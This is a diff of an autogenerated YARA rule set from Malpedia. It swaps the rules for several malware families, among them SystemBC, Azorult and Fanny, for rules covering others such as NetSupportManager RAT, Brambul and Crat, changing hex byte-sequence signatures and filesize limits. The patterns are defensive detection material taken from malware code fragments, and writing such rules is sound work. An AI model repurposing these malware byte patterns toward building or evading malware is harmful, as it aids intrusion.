@@ -130084,32 +129968,32 @@ rule MALPEDIA_Win_Ghost_Secret_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 50 56 ff15???????? 8d8c24a4050000 6a13 }
-		$sequence_1 = { c68424eb02000040 c68424ec02000017 c68424ed02000034 c68424ee020000da c68424ef020000f8 c68424f002000003 c68424f1020000c7 }
-		$sequence_2 = { 85c0 55 7518 68beb60000 e8???????? 83c408 5f }
-		$sequence_3 = { c68424c8070000a6 c68424c9070000c9 c68424ca0700004e c68424cb07000072 c68424cc07000008 c68424cd070000dc c68424ce0700007b }
-		$sequence_4 = { 6689442460 50 8b44247c c744242400000000 50 6a00 }
-		$sequence_5 = { c684243e04000031 c684243f040000cb c68424400400006c c68424410400006c c684244204000075 }
-		$sequence_6 = { 8d54244c 57 52 50 ff15???????? 85c0 }
-		$sequence_7 = { 75dc 5f 5e 5d b890f0ffff 5b c3 }
-		$sequence_8 = { c68424b7070000d1 c68424b40400004b 888c24b5040000 c68424b60400007e c68424b704000049 c68424b80400006e c68424b904000070 }
-		$sequence_9 = { 8b440e08 83f809 0f87cf000000 ff248520ae4000 6a07 8d542444 e9???????? }
+		$sequence_0 = { 8345fc04 8901 ff45f8 8b45f8 }
+		$sequence_1 = { 8b5508 2bd7 8955f4 8975fc }
+		$sequence_2 = { 59 84c0 7413 8b450c 56 ff7508 8b7510 }
+		$sequence_3 = { 833c8100 7505 85c0 75f1 c3 40 }
+		$sequence_4 = { 8b550c 8b4510 b900100000 2b8e7c3b0000 33db 2b55fc 1bc3 }
+		$sequence_5 = { 7709 39450c 0f86dc000000 8b550c 8b4510 }
+		$sequence_6 = { 6a00 50 e8???????? 8b4df0 83c40c 85c9 7e58 }
+		$sequence_7 = { 7433 8b7d0c 8b5508 2bd7 8955f4 8975fc }
+		$sequence_8 = { 762e 85d2 7838 8b4508 8b04b8 83651400 837d1420 }
+		$sequence_9 = { 3b7d0c 72d2 85d2 780a }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 573440
 }
-rule MALPEDIA_Win_Onliner_Auto : FILE
+rule MALPEDIA_Win_Netsupportmanager_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e266190c-77cd-5e00-b175-da1e4e33561c"
+		id = "13acdf1c-aae7-5f3b-a339-4a965b00f439"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.onliner_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.netsupportmanager_rat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c9e55a1b6192aded12d9bdf9f70d961ece286b9f8d470b491a50250894e58dcc"
+		logic_hash = "3b964c7562d1d913c21c0e25b573efbe6d24c01cca1047333434d5efeafe733c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130123,32 +130007,32 @@ rule MALPEDIA_Win_Onliner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8bf0 85f6 0f85ab000000 8b45f8 8945f4 e9???????? }
-		$sequence_1 = { 58 e8???????? 0f8436010000 a1???????? e8???????? 3c01 7412 }
-		$sequence_2 = { 058a4c2a8d ba14000000 e8???????? 03c7 8bf0 8bc7 33c6 }
-		$sequence_3 = { 8910 33c0 8ac3 8d448604 8b17 e8???????? 8b17 }
-		$sequence_4 = { e8???????? ff75ec 8b45fc e8???????? 0fb7c0 8d55e4 e8???????? }
-		$sequence_5 = { eb41 83c0bf 83e81a 7225 83c0fa 83e81a }
-		$sequence_6 = { 837df800 750f 8bc3 8b55fc e8???????? e9???????? 8b45f8 }
-		$sequence_7 = { 8bd7 e8???????? 8b0424 833800 742e 8b0424 }
-		$sequence_8 = { 8993b4010000 8d8398000000 e8???????? 8d9398000000 8b83b4010000 e8???????? 8bc3 }
-		$sequence_9 = { 8bcf 83e11f c1e106 8b048560f94c00 c644080401 57 e8???????? }
+		$sequence_0 = { e8???????? 8b4530 83c62c 3bf0 7516 8b4538 83c004 }
+		$sequence_1 = { ffd7 68???????? 56 894344 ffd7 8b7508 89431c }
+		$sequence_2 = { e9???????? 8d8d4cffffff e9???????? 8d8dacfeffff e9???????? 8d8d6cffffff e9???????? }
+		$sequence_3 = { e8???????? 83f82a 7520 ba???????? 85d2 7417 6877270000 }
+		$sequence_4 = { ffd7 8b4620 50 ff15???????? 8b4e24 5f 66c741080000 }
+		$sequence_5 = { 8dbe88000000 c745fc06000000 8b07 85c0 7403 50 ffd3 }
+		$sequence_6 = { ff15???????? 5f 33c0 5e c3 68???????? 56 }
+		$sequence_7 = { e8???????? 8b3d???????? 83c418 68???????? 56 ffd7 3bc3 }
+		$sequence_8 = { ff4020 8b7604 8b460c 85c0 740a 8b450c 85c0 }
+		$sequence_9 = { ff5254 83f8ff 0f8517020000 8b4514 8b16 50 57 }
 
 	condition:
-		7 of them and filesize < 1736704
+		7 of them and filesize < 4734976
 }
-rule MALPEDIA_Win_Systembc_Auto : FILE
+rule MALPEDIA_Win_Pirpi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f869723-6075-5b32-a402-475b08d3e463"
+		id = "a7077df7-231e-50c6-a30a-b0c867545de5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.systembc_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pirpi_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "9ee9f5ea5ece65bf2a7fd4bf4633a524cd0ca65ce3683cb8ae8b66a7bc9315ba"
+		logic_hash = "e76dba310cd3f8d181253104bae884733437724bbd7b8a3e7170c860a0db32f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130162,40 +130046,34 @@ rule MALPEDIA_Win_Systembc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b000 ae 75fd 8a57fe }
-		$sequence_1 = { 8b7d0c 8b4d10 f3a4 5e }
-		$sequence_2 = { 33c0 ab 837d0c00 7403 ff47fc }
-		$sequence_3 = { e8???????? 8d5804 6a18 e8???????? 83c061 aa }
-		$sequence_4 = { 57 56 ff7508 e8???????? 8bd0 }
-		$sequence_5 = { 66837aff00 7502 eb2e 837d0cff 7518 837d1000 }
-		$sequence_6 = { c7049e00000000 b800000000 5e 5f 5b }
-		$sequence_7 = { 8b4514 ab 8b4518 ab b801000000 }
-		$sequence_8 = { 6a01 6a00 8b85bcfbffff 8b08 8b5118 50 }
-		$sequence_9 = { c68573ffffff05 c68574ffffff01 c68575ffffff00 c68576ffffff01 48c78510ffffff01000000 }
-		$sequence_10 = { 4883c420 66c7474e0100 c6475101 c6477b00 4883ec40 }
-		$sequence_11 = { 0f858e010000 4883ec20 48c7c100000000 48c7c200000100 }
-		$sequence_12 = { 49c7c0faff0000 49c7c100000000 ff15???????? 4883c420 }
-		$sequence_13 = { e8???????? 4883c420 4883ec20 488d8e88010000 488d55b0 }
-		$sequence_14 = { 4c8d474e 49c7c132000000 e8???????? 4883c420 488b4598 4883c01c 4883ec20 }
-		$sequence_15 = { 488b8d48f9ffff 498d1438 4c8bc0 49c7c100000000 }
+		$sequence_0 = { e8???????? 8bf8 8d4610 50 8d4c2424 6a0c }
+		$sequence_1 = { bf???????? 8bf0 33db c70200000000 f3a7 745c b904000000 }
+		$sequence_2 = { 0f849e000000 8d7c2434 83c9ff 33c0 f2ae f7d1 49 }
+		$sequence_3 = { 8bca 8b5510 83e103 52 f3a4 }
+		$sequence_4 = { 8b542404 57 85d2 c705????????00000000 7461 8bfa }
+		$sequence_5 = { 8bac24f0000000 8d7c241c 2beb 8b07 }
+		$sequence_6 = { 83fbff 742b b941000000 33c0 8d7c2420 85f6 f3ab }
+		$sequence_7 = { ff15???????? 8bf0 85f6 897508 7545 8b5d0c }
+		$sequence_8 = { 81ec10020000 8bd1 b940000000 33c0 57 8dbc2414010000 }
+		$sequence_9 = { 81c41c020000 c3 8bb42430020000 85f6 0f841dffffff b941000000 8d7c2420 }
 
 	condition:
-		7 of them and filesize < 75776
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Skipper_Auto : FILE
+rule MALPEDIA_Win_Brambul_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "efc6c970-e4f9-50aa-846f-5655368eb02c"
+		id = "4ed55462-e49e-50fe-a0d1-6f0e1f85cf77"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.skipper_auto.yar#L1-L422"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.brambul_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "37baa21ea468db7e2c53f174ee34fcc7e3c9a0f2d929add42b329e84f24f9a81"
+		logic_hash = "938c39a82f375c34fe26abb1fc00229e1aa1c5407e38b617fd73b29996474592"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -130207,68 +130085,38 @@ rule MALPEDIA_Win_Skipper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a00 6a03 68???????? 68???????? 6a50 }
-		$sequence_1 = { e8???????? 6804010000 e8???????? 6804010000 8bf8 }
-		$sequence_2 = { ff15???????? 6a00 6a00 6a00 6a00 68???????? 68???????? }
-		$sequence_3 = { b9???????? e8???????? 6a04 e8???????? 8bf8 57 }
-		$sequence_4 = { 320439 47 8847ff 4e 0f8568ffffff 8b4dfc }
-		$sequence_5 = { 8d95fcfeffff 03d0 8b85f8feffff 8a1a 0fb6c0 8d8dfcfeffff }
-		$sequence_6 = { 40 0fb60438 0fb6ca 03d8 03d9 81e3ff000080 7908 }
-		$sequence_7 = { 888405fcfeffff 40 3d00010000 7cf1 33db 33f6 }
-		$sequence_8 = { e8???????? 83c404 6a00 6a64 52 }
-		$sequence_9 = { 0fb645f8 8a8c05f0feffff 888deffeffff 0fb655fc 0fb645f8 }
-		$sequence_10 = { 48897c2420 4156 4881ec10010000 488b05???????? }
-		$sequence_11 = { 83c101 898ddcfeffff 8b95dcfeffff 3b5514 0f8dcf000000 8b45f8 83c001 }
-		$sequence_12 = { 488b05???????? 4833c4 4889842400010000 4c8b9c2440010000 33c9 }
-		$sequence_13 = { 0fb655fc 0fb645f8 8a8c15f0feffff 888c05f0feffff 0fb655fc 8a85effeffff 888415f0feffff }
-		$sequence_14 = { 8885eefeffff 8b4d10 038ddcfeffff 0fbe11 }
-		$sequence_15 = { 7d0d 41ffca 4181ca00ffffff 41ffc2 0fb6c1 }
-		$sequence_16 = { 888415f0feffff 0fb64df8 0fb6940df0feffff 0fb645fc 0fb68c05f0feffff 03d1 }
-		$sequence_17 = { 48 0d00ffffff 40 8945f8 8b4df8 0fb6940df0feffff }
-		$sequence_18 = { 41ffc8 4181c800ffffff 41ffc0 410fb6c0 }
-		$sequence_19 = { 450fb608 4803d0 0fb602 418800 44880a 410fb610 }
-		$sequence_20 = { 8d1492 03d2 2bc2 4863d0 420fb60432 }
-		$sequence_21 = { 0fb695e8feffff 8a85effeffff 888415f0feffff e9???????? }
-		$sequence_22 = { 488d1424 4c03c0 410fb6c2 450fb608 4803d0 0fb602 }
-		$sequence_23 = { 888deffeffff 0fb695e8feffff 8b85e0feffff 8a8c15f0feffff 888c05f0feffff 0fb695e8feffff }
-		$sequence_24 = { 492bfb ffc1 81e1ff000080 7d0a ffc9 }
-		$sequence_25 = { 83e61f c1e606 03348520b72300 8b45e4 }
-		$sequence_26 = { c78424a80000000f000000 c78424a400000000000000 c684249400000000 720f ffb424f4000000 e8???????? }
-		$sequence_27 = { 4883ec20 4863d9 488bf3 48c1fe05 4c8d3d32a50000 83e31f 486bdb58 }
-		$sequence_28 = { 33c5 8945fc 57 8d85f0feffff 50 }
-		$sequence_29 = { 488bcb 488bc3 488d15faa20000 48c1f805 }
-		$sequence_30 = { 8985d8feffff 6a00 6804010000 8d85f0feffff 50 8b8dd8feffff 51 }
-		$sequence_31 = { 7405 e8???????? 488b8ba0000000 488d05c3910000 483bc8 }
-		$sequence_32 = { 4885c0 7509 488d0543aa0000 eb04 4883c014 8938 e8???????? }
-		$sequence_33 = { 50 6a00 8b8dd4feffff 51 ff15???????? }
-		$sequence_34 = { 897e70 c686c800000043 c6864b01000043 c7466888a22300 }
-		$sequence_35 = { eb0a c785d4feffffffff1f00 8b4508 50 6a00 }
-		$sequence_36 = { 85f6 7447 8802 8b048d606d4100 }
-		$sequence_37 = { 741a 488d0579d80000 483bf8 740e 833f00 }
-		$sequence_38 = { 736b 488bdf 488bf7 48c1fe05 4c8d2537ae0000 83e31f }
-		$sequence_39 = { 6a00 8b85d8feffff 50 8b8dd0feffff 51 6a00 6a00 }
-		$sequence_40 = { 8b45f4 46 83fa03 750e 8b0c85606d4100 }
-		$sequence_41 = { 7367 4863d9 4c8d359aa40000 488bfb 83e31f }
-		$sequence_42 = { 488d0d86a30000 488bc2 83e21f 48c1f805 486bd258 488b04c1 }
-		$sequence_43 = { 59 8945e4 8b7508 c7465cd8812300 33ff }
-		$sequence_44 = { 8bd8 85f6 7478 8b45fc }
-		$sequence_45 = { 83ef80 83c410 8975f0 897dec 3bf3 }
+		$sequence_0 = { 8d4e03 2bee 8a01 8ad8 80e30f c0e804 }
+		$sequence_1 = { a3???????? 68???????? 68???????? e8???????? 83c408 50 }
+		$sequence_2 = { 8d8c2438020000 51 ff15???????? 8bac2428090000 83c9ff 8bfd }
+		$sequence_3 = { 33c0 8d94240c010000 f2ae f7d1 2bf9 6a00 8bc1 }
+		$sequence_4 = { 8b4c241c 40 3bc1 89442418 0f8cfefeffff 8b442414 }
+		$sequence_5 = { 83c40c 8b5514 833a00 0f84db000000 837decfe 0f8ed1000000 c745e401000000 }
+		$sequence_6 = { 8985a849ffff 8985c05dffff 8985c45dffff 8945f8 895df0 }
+		$sequence_7 = { 8b4002 8985b049ffff c785ac49ffff02000000 e9???????? f6c140 0f8428010000 f6c120 }
+		$sequence_8 = { 42 bf08000000 89542410 c6041600 85ed }
+		$sequence_9 = { 48 234508 8d0440 8d0441 0fb64801 }
+		$sequence_10 = { 8913 5f d3e7 3bc8 7316 }
+		$sequence_11 = { 46 6a00 8d849db84dffff 56 }
+		$sequence_12 = { 0f8e5b020000 68???????? 68???????? 8d54242c 68???????? 52 }
+		$sequence_13 = { 03f3 8bd9 8dbc379979825a 8bf7 }
+		$sequence_14 = { 81c404010000 c3 56 8d542414 68???????? }
+		$sequence_15 = { c1ee17 c1e709 0bf7 33ce 8bf9 33fa }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Fast_Pos_Auto : FILE
+rule MALPEDIA_Win_Hotwax_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "057c36f1-0a19-594b-99bb-5ac5d28c2830"
+		id = "8f2ed895-b1d8-5520-8ccc-967359fd3764"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fast_pos_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hotwax_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "bb07ee6c2efdd43c16301c1c39c93cc562e35ab0089f1712602de2983cb204bb"
+		logic_hash = "d7cd386e473b27344ee89ce7aa7064b521c3dfeec69fed7db0108e253da6990c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130282,32 +130130,32 @@ rule MALPEDIA_Win_Fast_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8b7510 c745fc00000000 57 8bf9 85f6 792b }
-		$sequence_1 = { 50 68???????? 56 c7857cffffff01000000 e8???????? }
-		$sequence_2 = { ffb5e8feffff ff15???????? 85c0 7517 }
-		$sequence_3 = { 5d c20c00 81feffffff7f 7ecf eb33 8b49f0 }
-		$sequence_4 = { 8bec 8b4508 53 56 8bd9 8b30 }
-		$sequence_5 = { e8???????? 6a10 68???????? 68???????? 6a00 ff15???????? 6a00 }
-		$sequence_6 = { 6a64 8d4580 c745fc00000000 50 89b578ffffff c7857cffffff00000000 ff15???????? }
-		$sequence_7 = { 0f9485ebfeffff 83c2f0 83cfff 8bc7 8d4a0c f00fc101 48 }
-		$sequence_8 = { 56 c785e8feffff01000000 e8???????? 83c40c 8bc6 }
-		$sequence_9 = { e8???????? ff30 ff15???????? 8b95e4feffff 8bcf }
+		$sequence_0 = { 807d580a 4c8d05737dffff 740f eb07 4c8d05687dffff 448823 48ffc3 }
+		$sequence_1 = { 488d542448 488d8c2400020000 e8???????? 488b5c2448 85c0 740b ff15???????? }
+		$sequence_2 = { 4889842410030000 488bf9 488d8c2401020000 33d2 41b803010000 c684240002000000 }
+		$sequence_3 = { 488d15edd30000 488bcb 488905???????? ff15???????? 488d15bed30000 }
+		$sequence_4 = { 4533db 488d9424f0000000 41b803010000 44895c2440 4c895c2448 ff15???????? 833d????????00 }
+		$sequence_5 = { 486bd258 490394c1a04b0100 f6423880 742c }
+		$sequence_6 = { c785080500004c647247 c7850c05000065745072 c785100500006f636564 c7851405000075726541 c7851805000064647265 }
+		$sequence_7 = { 0f84da000000 488b9424b0000000 8bd8 410fb7f6 4803da 488d3c0a 488b0b }
+		$sequence_8 = { 488b0d???????? eb7c 4c8d256a830000 488b0d???????? eb6c e8???????? }
+		$sequence_9 = { 33c0 e9???????? 48895c2408 4c63c1 488d1d45770000 4d8bc8 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 198656
 }
-rule MALPEDIA_Win_Fanny_Auto : FILE
+rule MALPEDIA_Win_Curlback_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9aa21a1-9e7c-5e0d-923d-00e6b6ec80ca"
+		id = "92c5ff94-7733-554e-9411-adf2e04e8882"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fanny_auto.yar#L1-L171"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.curlback"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.curlback_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "b1e6181f341236f9aaf561cfa6c0c3a83917a87202fe2ed6a96ef4c3d3c432e2"
+		logic_hash = "5762a9ce8640933ae705745a803bbe43e75d1e28f524d7c7dfbc6bececc7a9c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130321,38 +130169,32 @@ rule MALPEDIA_Win_Fanny_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d4dd8 e8???????? 8b45b4 }
-		$sequence_1 = { 8b7d0c 8bf7 8b4508 3bc3 0f84b8020000 }
-		$sequence_2 = { a2???????? 8d45fc 50 8d45f0 a4 6a08 50 }
-		$sequence_3 = { 57 895df0 740b c1e809 894df4 c1e009 eb03 }
-		$sequence_4 = { 5d c3 66c78594fbffff6800 b903000000 8dbd90fbffff 8db5d0fbffff 33d2 }
-		$sequence_5 = { 8b4c2408 33f6 8901 8bc6 }
-		$sequence_6 = { 50 6808100000 56 ffd7 8b0d???????? }
-		$sequence_7 = { 83780c00 7422 8b4dfc 83790400 7419 8b55fc 837a0800 }
-		$sequence_8 = { e8???????? 8b45d0 50 8b4d08 51 }
-		$sequence_9 = { 894508 8b5510 83ea05 895510 eb09 }
-		$sequence_10 = { e9???????? 8b5508 0fb602 3d90000000 753b 8b4d08 }
-		$sequence_11 = { f3ab 66ab aa 8a4508 }
-		$sequence_12 = { 5b 5d c3 55 8bec 83ec2c 8065ff00 }
-		$sequence_13 = { 832700 6800800000 6a00 53 ff15???????? }
-		$sequence_14 = { 8b45fc 83c012 50 ffd3 8bf0 59 }
-		$sequence_15 = { 8913 751b c745fc01000000 ff33 ff15???????? }
+		$sequence_0 = { e8???????? 84c0 7420 488d153ac20c00 488bcb e8???????? eb0f }
+		$sequence_1 = { ba15000000 488bce e8???????? eb4c 488b5318 488bc8 e8???????? }
+		$sequence_2 = { 8bd8 85c0 752e 488b97a8080000 488d8f08130000 e8???????? 8bd8 }
+		$sequence_3 = { 85c0 7848 488b4550 488b08 488b5958 498bd6 488d8d88000000 }
+		$sequence_4 = { 7527 488b4c2460 4c8bc5 e8???????? 85c0 7516 488d15ac050b00 }
+		$sequence_5 = { 4883c908 498bc7 48894c2470 0fb6d1 48894590 eb14 b8f7ffffff }
+		$sequence_6 = { baffff0000 e8???????? 48899ec8010000 33c0 8983ac1c0000 488bce }
+		$sequence_7 = { e8???????? 894340 83f80d 742a 83f80b 0f8562050000 498bce }
+		$sequence_8 = { eb11 488b4308 488b08 48894ddf eb04 4c897def 48895db7 }
+		$sequence_9 = { 80bd2d13000000 7513 488bcd 85db 0f84a1000000 488bd3 e8???????? }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 4027392
 }
-rule MALPEDIA_Win_Thunderx_Auto : FILE
+rule MALPEDIA_Win_Spyder_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2518ca7c-7e0a-565b-be3c-84d244188fab"
+		id = "3b0ab008-5fca-5304-bb77-2526da47aa2d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.thunderx_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spyder_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "4292a9f6c1d3812002d780fdcc81ab5726cfcf5e40c47b2cebcf85c542667c9b"
+		logic_hash = "12d22cf7781abc3ab19a5f3d98a04aaf02d5caaba80e64280fab23edd5e8d3b7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130366,32 +130208,38 @@ rule MALPEDIA_Win_Thunderx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 e8???????? 59 8d45b0 8bcf 50 e8???????? }
-		$sequence_1 = { 75f2 85c9 7509 3bc6 740b 83e802 ebd7 }
-		$sequence_2 = { 8bcb e8???????? 83c318 83c618 895de0 3bf7 75eb }
-		$sequence_3 = { 8b35???????? ffd6 ff75ec ffd6 b001 eb02 32c0 }
-		$sequence_4 = { 7462 8b44240c 3b05???????? 7556 8b442410 89442438 8b442414 }
-		$sequence_5 = { c3 6a54 b8???????? e8???????? 8bf9 897dac }
-		$sequence_6 = { 7415 ff15???????? 85c0 750b e8???????? 84c0 }
-		$sequence_7 = { 59 56 8bd0 885dfc 8d8d40feffff e8???????? 59 }
-		$sequence_8 = { e8???????? 8d8dc8fdffff e8???????? 8d8db0fdffff c645fc05 e8???????? }
-		$sequence_9 = { 8bfa 2b7d0c eb02 8bfe }
+		$sequence_0 = { 488d057a150000 488905???????? 488d0590200000 488905???????? 488d0576150000 488905???????? }
+		$sequence_1 = { 488bc8 ff15???????? 488d15385f0000 488bce 488905???????? ff15???????? }
+		$sequence_2 = { 4181f9000000c0 7532 4585d2 756e 488d4b04 4c8d05563e0000 }
+		$sequence_3 = { 4c8d05fc890000 498bd4 488bcd e8???????? 85c0 }
+		$sequence_4 = { 486bd258 488b04c1 488d4c1010 48ff25???????? 48895c2408 57 }
+		$sequence_5 = { 4c8bd8 488905???????? 4885c0 7422 488d15795e0000 488bce ff15???????? }
+		$sequence_6 = { 488d0d68a10000 e8???????? 488d1584a10000 488d0d75a10000 e8???????? 90 }
+		$sequence_7 = { 443bce 753c 4585d2 7537 488d4b04 4c8d05173e0000 418d5216 }
+		$sequence_8 = { 6803010000 f3ab 66ab aa 8d442414 50 }
+		$sequence_9 = { 8b4c2414 81e2ffff0000 25ffff0000 52 8b542416 }
+		$sequence_10 = { ff15???????? 5f 5e b801000000 5b 81c47c150000 c3 }
+		$sequence_11 = { 8bec 8b4508 ff348570370910 ff15???????? 5d }
+		$sequence_12 = { c1f805 8d3c85204b0910 8bc3 83e01f }
+		$sequence_13 = { 8944241a 66895c2410 668944241e ff15???????? 8b542418 8b442416 }
+		$sequence_14 = { f3ab 8b8c248c150000 8d942488010000 66ab aa 8d842490150000 }
+		$sequence_15 = { b918000000 33c0 8d7c2431 885c2430 }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 1458176
 }
-rule MALPEDIA_Win_Azorult_Auto : FILE
+rule MALPEDIA_Win_Crat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a0ff14cf-728e-57b5-b780-187246815def"
+		id = "6875ef99-cb78-5d35-8902-45286f9925fd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.azorult_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crat_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "b964bdc09887e46f350cee1282648afbe20db6ec0890aa267b03a312df1100f6"
+		logic_hash = "6a558eedfed48b48235f564ba72a779c4c350ad31cd93998f4d10b79b9d23f07"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -130405,32 +130253,39 @@ rule MALPEDIA_Win_Azorult_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8901 8bc1 c7410410000000 5d c20400 55 8bec }
-		$sequence_1 = { ff15???????? 8b4dc8 8bd1 81e20000ff00 8bc1 c1e810 0bd0 }
-		$sequence_2 = { 83c410 5e c9 c3 55 8bec 81eccc060000 }
-		$sequence_3 = { 8d9adcbc1b8f 8b702c 03d9 337018 8bcf }
-		$sequence_4 = { 6a00 6a00 ff7508 ff7510 ff15???????? 85ff 7405 }
-		$sequence_5 = { e8???????? 84c0 0f8444010000 8d45d8 50 8d4dfc e8???????? }
-		$sequence_6 = { 83fa04 1bc0 83e004 8b443814 d3e8 884415f8 42 }
-		$sequence_7 = { 68???????? 680000baba 50 50 e8???????? a1???????? 85c0 }
-		$sequence_8 = { c3 55 8bec 81ec2c020000 56 8d85d8fdffff 33f6 }
-		$sequence_9 = { 80f920 74f4 80f97d 750c 8d4201 8907 8bc3 }
+		$sequence_0 = { e8???????? 488bd0 488d8d78010000 e8???????? 90 }
+		$sequence_1 = { 488bd0 488d8d38030000 e8???????? 90 }
+		$sequence_2 = { e8???????? 488bd0 488d8d28010000 e8???????? 90 }
+		$sequence_3 = { e8???????? 488bd0 488d4d90 e8???????? 90 488bd0 }
+		$sequence_4 = { e8???????? 488bd0 488d8db8000000 e8???????? 90 }
+		$sequence_5 = { e8???????? 488bd0 488d8d40010000 e8???????? 90 }
+		$sequence_6 = { e8???????? 488bd0 488d8de8000000 e8???????? 90 }
+		$sequence_7 = { ebd0 498bc4 48833d????????10 480f4305???????? 482bc8 }
+		$sequence_8 = { 33d2 c1e902 f7f1 eb02 }
+		$sequence_9 = { ffd0 85c0 750f ff15???????? 83f87a }
+		$sequence_10 = { 52 8b01 ff5004 c645fc08 8bcf 8b5648 }
+		$sequence_11 = { 2b460c f20f114dc0 83f810 7d0d 51 }
+		$sequence_12 = { 50 e8???????? 83c404 e8???????? 33d2 f7f7 81c2e8030000 }
